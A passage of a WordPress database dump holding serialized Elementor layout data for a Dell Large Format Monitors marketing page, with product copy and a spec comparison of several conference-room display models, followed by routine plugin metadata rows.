class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fca6377\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"32f148a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_06.jpg\\\" alt=\\\"Flexible IT solutions\\\" width=\\\"445\\\" height=\\\"351\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0d8bc3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"be5af88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"28958ec\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b7a77eb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5bc9eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e074cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_07.jpg\\\" alt=\\\"Adapts to business needs. Present and future.\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b39d618\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4f1e8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Adapts to business needs. Present and future.<\\/h2><\\/div><div><ul><li><strong>Solutions that work with you:<\\/strong>\\u00a0Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology you\\u2019re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can also\\u00a0be loaded with your preferred corporate image, so that it adheres to your security and service standards.<\\/li><\\/ul><ul><li><strong>Customized to your needs:<\\/strong>\\u00a0Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7383992\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4264633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"494b60f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9282776\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"91efb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"758e0fa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Easy to deploy. Simple to manage.<\\/h2><\\/div><div><ul><li><strong>A smooth deployment:<\\/strong>\\u00a0With a few painless steps, and a couple of extra hands, it\\u2019s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether that\\u2019s a mobile cart, stand or wall mount.<\\/li><li><strong>Manage your meeting spaces:<\\/strong>\\u00a0With RS232 and RJ45<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7ed52d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"35ef182\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_08.jpg\\\" alt=\\\"Easy to deploy. Simple to manage.\\\" width=\\\"355\\\" height=\\\"263\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3643da4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"eba13d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"99eb408\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_09.jpg\\\" alt=\\\"Ultimate management\\\" width=\\\"337\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84d2d5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"857f2f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Ultimate management<\\/h2><\\/div><div><ul><li><strong>Seamless integration for easy access:<\\/strong>\\u00a0Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0without the need for a separate power cord, simplifying access to WiFi, annotation\\u00a0and\\u00a0meeting room management applications.<\\/li><li><strong>Easy to upgrade:<\\/strong>\\u00a0Thanks to\\u00a0it\'s\\u00a0modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0986c04\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea07f49\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8d2e27\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"651dcf7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"e0e5fdb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"e3c5aec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Solutions you can count on<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7c7592f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"8349623\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_10.jpg\\\" alt=\\\"Solutions you can count on\\\" width=\\\"412\\\" height=\\\"325\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b154bbe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8c77514\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ab08df2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb13a0c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"69147c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.955},\"elements\":[{\"id\":\"ff020de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_11.jpg\\\" alt=\\\"Dependable reliability\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1222e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.045},\"elements\":[{\"id\":\"1b3c901\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Dependable reliability<\\/h2><\\/div><div><strong>Peace of mind comes standard:<\\/strong>\\u00a0Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a class=\\\"technote microcontent\\\" rel=\\\"technotes:advanced-exchange-service-monitors\\\">*<\\/a>\\u00a0so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a class=\\\"technote microcontent\\\" rel=\\\"technotes:hardware-warranty-monitors\\\">*<\\/a>\\u00a0up to 5-years for additional support.<br \\/><br \\/><strong>Low maintenance. Simple manageability:\\u00a0<\\/strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"95edd1d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"542b068\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2c3e21d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a24ced\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"c0cc680\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e29177f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6295038\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C5519Q<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b359d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"051af0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C5518QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da22a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a4304b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C7017T<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"44f258e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"4a78e3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"132399f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"531c7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c5519q\\/global_spi\\/monitor-c5519q-campaign-hero-504x350-ng.psd?fmt=jpg\\\" alt=\\\"C5519Q Monitor\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"76134a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d51c658\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c5518qt\\/pdp\\/dell-monitor-c5518qt-pdp-03-v2.jpg?fmt=jpg\\\" alt=\\\"Dell Monitor C5518QT\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4560da4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"19ac253\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c7017t\\/global_spi\\/dell-monitor-c7017t-black-right-usage-hero-504x350-ng.psd?fmt=png-alpha\\\" alt=\\\"Dell 70 (C7017t) Conference Room Monitor\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df69254\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"7110fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38f6a9a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Resolution<\\/strong><br \\/><strong>OptiPlex Micro Mounting via<\\/strong><br \\/><strong>Touch\\/Non-Touch<\\/strong><br \\/><strong>Image Size<\\/strong><br \\/><strong>Panel Type<\\/strong><br \\/><strong>Surface<\\/strong><br \\/><strong>Mount<\\/strong><br \\/><strong>Connectivity<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bc54c67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0e720c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>Optional bracket<br \\/>Non-touch<br \\/>54.6 in<br \\/>Vertical Alignment Glass<br \\/>Anti-glare<br \\/>Optional wall mount<br \\/>2x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"496feb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3b3a4fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>54.6 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>7x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d0318\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2186554\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Full HD<br \\/>Optional bracket<br \\/>10 points of touch<br \\/>69.5 in<br \\/>Vertical Alignment Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Wall mount included<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7995cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"2e6862a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3147a86\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Mount<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a36ed2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f952d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5dd861a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"17c56c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a4c7b0b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98647d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wall mount included<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b54172e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"a5d7418\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"9a5bdd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8ed1991\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"566ed8d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"716c03c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"571af73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"feb7900\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f41ecd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"1593399\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6add182\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ae25c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C7520QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1ea23e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b917ab9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C8618QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9debee7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"36275c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96cecb2\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"40a96dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ed83b27\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3418f13\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c7520qt\\/global_spi\\/ng\\/monitor-c7520qt-campaign-hero-504x350-ng.png?fmt=jpg\\\" alt=\\\"Dell 75 4K Interactive Touch Monitor: C7520QT\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"60e9977\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"587b761\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c8618qt\\/global_spi\\/monitor-c8618qt-black-right-usage-hero-504x350-ng.psd?fmt=jpg\\\" alt=\\\"Dell-C8618QT-Monitor \\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"360bdc1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8248f1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e32e6e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"190bffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"277c65b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Resolution<\\/strong><br \\/><strong>OptiPlex Micro Mounting via<\\/strong><br \\/><strong>Touch\\/Non-Touch<\\/strong><br \\/><strong>Image Size<\\/strong><br \\/><strong>Panel Type<\\/strong><br \\/><strong>Surface<\\/strong><br \\/><strong>Mount<\\/strong><br \\/><strong>Connectivity<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a6ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"59088a1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>75 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34c2543\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f5d29f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>85.6 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>4x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>7x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d69a802\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"82bae14\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9ab178a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"7df1615\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fb249a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Mount<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1702232\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"501ba37\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"47c9900\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"aa4df57\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2fc8b78\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ca71f29\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b8e407f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"cc014f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ac0433b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4de9045\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"39f02db\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6deb4e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f2ef27\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"347f8a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8796,3678,'_elementor_css','a:5:{s:4:\"time\";i:1572315647;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8798,3661,'_elementor_css','a:5:{s:4:\"time\";i:1572315668;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8799,3679,'_edit_lock','1572317023:1'),(8800,3679,'_edit_last','1'),(8801,3679,'_wp_page_template','template-fullwidth.php'),(8802,3679,'_elementor_controls_usage','a:0:{}'),(8803,3679,'swift-performance','a:0:{}'),(8804,3679,'_hide_page_title',''),(8805,3679,'_hide_header',''),(8806,3679,'_hide_footer',''),(8807,3679,'_hide_breadcrumb',''),(8808,3679,'_cover',''),(8809,3679,'_show_excerpt',''),(8810,3679,'_wc_apply_product',''),(8811,3679,'_yoast_wpseo_content_score','30'),(8812,2906,'_elementor_css','a:5:{s:4:\"time\";i:1572333717;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8791,3678,'_elementor_edit_mode','builder'),(8792,3678,'_elementor_template_type','wp-page'),(8859,3691,'_elementor_css','a:6:{s:4:\"time\";i:1572524657;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(8858,3691,'_elementor_version','2.7.4'),(8855,3691,'_elementor_controls_usage','a:0:{}'),(8856,3691,'_elementor_edit_mode','builder'),(8857,3691,'_elementor_template_type','wp-page'),(8854,3691,'_wp_page_template','template-fullwidth.php'),(8819,3683,'_thumbnail_id','3688'),(8820,3683,'_elementor_controls_usage','a:0:{}'),(8821,3683,'swift-performance','a:0:{}'),(8822,3683,'_yoast_wpseo_con